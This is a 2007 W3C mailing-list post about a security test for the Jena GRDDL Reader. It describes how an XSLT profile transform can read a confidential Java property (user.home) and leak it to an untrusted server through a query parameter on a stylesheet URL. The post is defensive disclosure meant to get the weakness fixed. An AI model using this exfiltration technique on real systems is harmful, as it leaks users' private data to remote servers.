W3C home > Mailing lists > Public > public-grddl-comments@w3.org > January to March 2007

Some more tests

From: Jeremy Carroll <jjc@hpl.hp.com>
Date: Tue, 06 Feb 2007 17:04:06 +0000
Message-ID: <45C8B506.8030603@hpl.hp.com>
To: public-grddl-comments@w3.org

FYI - using profileTransformation to expose slightly more subtle 
security issues.

I am still working on improving security features of the Jena GRDDL 
Reader. I thought that a test I've just added may be of general interest.

The goal of the test is to expose a weakness in version 0.1 of the Jena 
GRDDL Reader, so that I can fix it in 0.2.
Since I have already addressed blatant issues, this is slightly more subtle.

The test is security6 at
http://jena.sourceforge.net/test/grddl/

i.e.
http://jena.sourceforge.net/test/grddl/security6.html

This has a profile, which has a transform which uses system-property() 
(an XSLT 1.0 function). Using Saxon, which I do, this accesses, in 
addition to the three xsl: properties, also java properties (which is 
conformant behaviour). Thjis transform accesses user.home, which is 
usually regarded as confidential information. This value is then set as 
the query parameter to the stylesheet URL which is referenced in the 
usual way as the value of an appropriate grddl:profileTransformation triple.
This URL is then got, using the GRDDL algorithm, which passes the 
confidential material (value of user.home) to the untrusted server.

In this particular case, the xsl script uses server side include to pass 
this value back as part of the GRDDL result.

In contrast, http://jena.sourceforge.net/test/grddl/permitted6.html 
accesses xsl:vendor-url (in my case http://www.saxonica.com/) which I 
don't think is regarded as confidential.

===

The issue this test raises is that the profileTransformation and 
schemaTransformation mechanisms provide a means for confidential data to 
be passed back to the server, even if less subtle means for the XSLT 
code to communicate to an outside server have been blocked (which they 
are in the Jena GRDDL Reader). Thus, the XSLT needs to run in an 
environment in which it has no access to confidential information.
(This is hence added to my to do list)

Jeremy
Received on Tuesday, 6 February 2007 17:04:36 UTC

This archive was generated by hypermail 2.3.1 : Tuesday, 6 January 2015 19:55:02 UTC